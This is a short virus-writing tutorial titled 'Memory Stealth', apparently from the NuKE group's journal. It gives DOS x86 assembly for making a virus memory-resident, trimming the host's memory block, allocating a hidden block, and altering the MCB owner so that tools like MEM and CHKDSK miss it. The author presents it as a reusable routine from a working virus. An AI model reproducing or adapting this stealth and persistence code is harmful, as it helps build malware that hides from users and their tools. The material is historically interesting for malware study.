73 lines
5.2 KiB
Plaintext
73 lines
5.2 KiB
Plaintext
|
|
*******************************
|
|
** Memory Stealth **
|
|
** **
|
|
** By Rock Steady/NuKE **
|
|
*******************************
|
|
|
|
The Advantages of having a Memory Resident Virus, are unlimited. When our
|
|
virus goes `TSR' it REALLY doesn't do ANYTHING. It just stays there,
|
|
waiting to be called upon. the 80x86 really doesn't MULTITASK, so don't
|
|
think the virus runs `in the Background' TSRs tend to hook on Interrupts,
|
|
depending what function they must do. If it must be called upon OFTEN,
|
|
hook Int 1C, if your must run when an File is Executed/Open/Close Hook
|
|
Int 21h. And everytime Int 21h is called, Your Virus Runs FIRST, then it
|
|
calls the original Int 21h.
|
|
|
|
I will try to explain on how cut off a block of Memory, Then we'll
|
|
allocate memory for the Virus, change the program MCB, and move the
|
|
virus resident in memory.
|
|
|
|
para_size equ 3
|
|
|
|
mov cx,es ;Get current Segment
|
|
dec cx ;Subtract 1, so we have MCB
|
|
mov es,cx ;Restore it back to ES
|
|
mov bx,es:para_size ;BX=MCB Size in Paragraphs
|
|
mov dx,virus_size ;DX=Virus Size
|
|
mov cl,4 ;Unfortunately, VirusSize is in Bytes
|
|
shr dx,cl ;While memory size is calculated in
|
|
add dx,4 ;paragraphs (16-Byte)
|
|
mov cx,es ;Start to Restore the Old Segment in ES
|
|
sub bx,dx ;oh, yeah, Minus Virus - Current memory
|
|
inc cx ;Increment CX
|
|
mov es,cx ;Put it back, NOTICE a PUSH ES + POP ES
|
|
mov ah,4ah ;would have been BETTER!!!!!
|
|
int 21h ;Call Dos to Adjust Memory block Size
|
|
|
|
; First part has been easily completed, Next code, Allocates Memory for
|
|
; the Virus...
|
|
jc exit_com ;Test, incase Error Happened
|
|
mov ah,48h ;Allocate Memory function
|
|
dec dx
|
|
mov bx,dx ;Number of 16-Byte Paragraphs to
|
|
int 21h ;Allocate
|
|
|
|
; Next this Function Returns the Segment of the Allocated memory Block
|
|
; in AX register. So edit its MCB and move the virus resident.
|
|
mem equ 2 ;Put theses with the rest...
|
|
jc exit_com ;Another Test for Errors...
|
|
dec ax ;Get it MCB
|
|
mov es,ax ;Put it into ES
|
|
mov cx,8h
|
|
mov es:mem,cx ;Fix MCB PSP blocks Owner
|
|
sub ax,0fh
|
|
mov di,103h ;Offset of where virus will start.
|
|
mov es,ax ;With is Segment
|
|
mov si,bp ;Put BP (Delta Offset) in SI
|
|
add si,offset init_virus ;Add to point to the begining of Virus
|
|
mov cx,virus_size ;How many Bytes to move?
|
|
cld ;Clear Direction Flag (Ascending)
|
|
repne movsb ;Copy from DS:SI to ES:DI
|
|
|
|
That is all needed to do the trick. And it will not show up with the Memory
|
|
Mapping Utilities like MEM or CHKDSK. However Dos will report Available
|
|
memory to be short by the Number of Paragraphs we Allocated. I will try
|
|
to fix this DARN thing that drives me crazy, I believe it can be solved
|
|
like our FCB Dir Method, Where we can add the Number of Paragraphs our
|
|
Virus Allocated back to them Memory Mapping Utilities. There IS a WAY!
|
|
And we will find it... This topic will be continued in Info Journal #5.
|
|
|
|
Rock Steady
|
|
`Check out N-PoX(es) to see this Routine Working'
|